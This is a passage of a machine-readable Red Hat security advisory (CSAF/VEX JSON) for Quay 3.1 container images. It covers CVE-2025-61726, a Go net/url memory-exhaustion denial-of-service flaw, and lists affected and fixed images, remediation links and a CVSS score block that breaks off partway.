"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64 as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"relates_to_product_reference": "Red Hat Quay 3.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x as a component of Red Hat Quay 3.1",
"product_id": "Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
},
"product_reference": "registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x",
"relates_to_product_reference": "Red Hat Quay 3.1"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-61726",
"cwe": {
"id": "CWE-770",
"name": "Allocation of Resources Without Limits or Throttling"
},
"discovery_date": "2026-01-28T20:01:42.791305+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2434432"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "golang: net/url: Memory exhaustion in query parameter parsing in net/url",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to send a specially crafted HTTP request to an application parsing URL-encoded forms with net/url, specifically a request containing a large number of unique query parameters. The request will cause the application to consume an excessive amount of memory and eventually result in a denial of service, with no impact to confidentiality or integrity. Due to this reason, this vulnerability has been rated with an important severity.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"known_not_affected": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-61726"
},
{
"category": "external",
"summary": "RHBZ#2434432",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2434432"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-61726",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-61726"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61726"
},
{
"category": "external",
"summary": "https://go.dev/cl/736712",
"url": "https://go.dev/cl/736712"
},
{
"category": "external",
"summary": "https://go.dev/issue/77101",
"url": "https://go.dev/issue/77101"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc",
"url": "https://groups.google.com/g/golang-announce/c/Vd2tYVM8eUc"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4341",
"url": "https://pkg.go.dev/vuln/GO-2026-4341"
}
],
"release_date": "2026-01-28T19:30:31.215000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-24T18:02:58+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5665"
},
{
"category": "workaround",
"details": "Red Hat has investigated whether a possible mitigation exists for this issue, and has not been able to identify a practical example. Please update the affected package as soon as possible.",
"product_ids": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0c8ad49237e784b6bcaf48c62928533a231026b1605926edee0313d3a83c10c4_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:de004a925cd7fdae3ba4698165c0a4e814607b6f33d2f7154c8d79b76c826dd7_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:6e13793ca8f309ec0b69ae609b840ff0f41989d88cd4bba127e1b0040631367e_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:c0d00643c4ac6f84e5327192a29c6353b5dcac34d483d0a3e5f39d366127fcc2_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-rhel8@sha256:f6a231ebb14c74e194a8091822fe6a981e1cec92d223e04e6d0f12b60206259a_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:733de3a7351b69265aee8d12c7fe65f60e099c923510758a75c8800409126c41_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:caa20d6002cfd42dc4ab86dee5dde07da0a7e1dcc310c9be33bf28a2df1ef82b_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/clair-rhel8@sha256:d59935575d41174ccd39a7d7610b44d7e6afa0f56041bdefa40bc7ad4e1c837f_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:042530fcf03002da68993546ee82f483f387bd09ffe5fefaad9344b80ee842b1_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:3fb6c2af69237c3ff2cd326bc655028392a2d11c9162b85a9c4a762cbe7d044b_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:4d88d159b8a0e46a8508735f555179c6b08caef62d42e5fb676fdac10e333f58_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:fe1c94521b952469093c28ca9805c6758b4ac2ec6e3aa2a2001645e304949a21_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:443977ffd46161f026a30edfb8735139b7c430ca7b054b71ada75fc251226c99_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:5558d6af86f65a79c88f1ffe290b49219d0f00c93ec8a03f0e81d0e9e13501fc_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:9e96b505901615f671d5b99094bda544ecbce32a3772125f2baf5f0ea67d5687_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-builder-rhel8@sha256:ba56dd8ef744ea12e21ade86c91a9faca072e39256f98edd677a419eeae8e7a0_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:7e7559212648d972eec26d27cad42b1f93fefcc61c6ab884a730a48c81574734_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:6bf4ab153aa99b67b1e3fe0cbf0fa3e3694d3394c957fc03a5578d03cb2e88bc_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:720000552d67523e437f0638abf185ae32040f1437225fc461be499490494ce7_ppc64le",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:edd76ba97d059e00755472146df0c84ff441c77e7cea12b9f5cd460f0c30e942_s390x",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-bundle@sha256:e165eed009ce74a4ad2de04ff1cbbcf9eabb3900bef6de3dd2483e484e9e10b3_amd64",
"Red Hat Quay 3.1:registry.redhat.io/quay/quay-operator-rhel8@sha256:0731cf4122bec0cef7c4f05ee19fe43871d977515c91e0decce981abeab85af6_ppc64le",
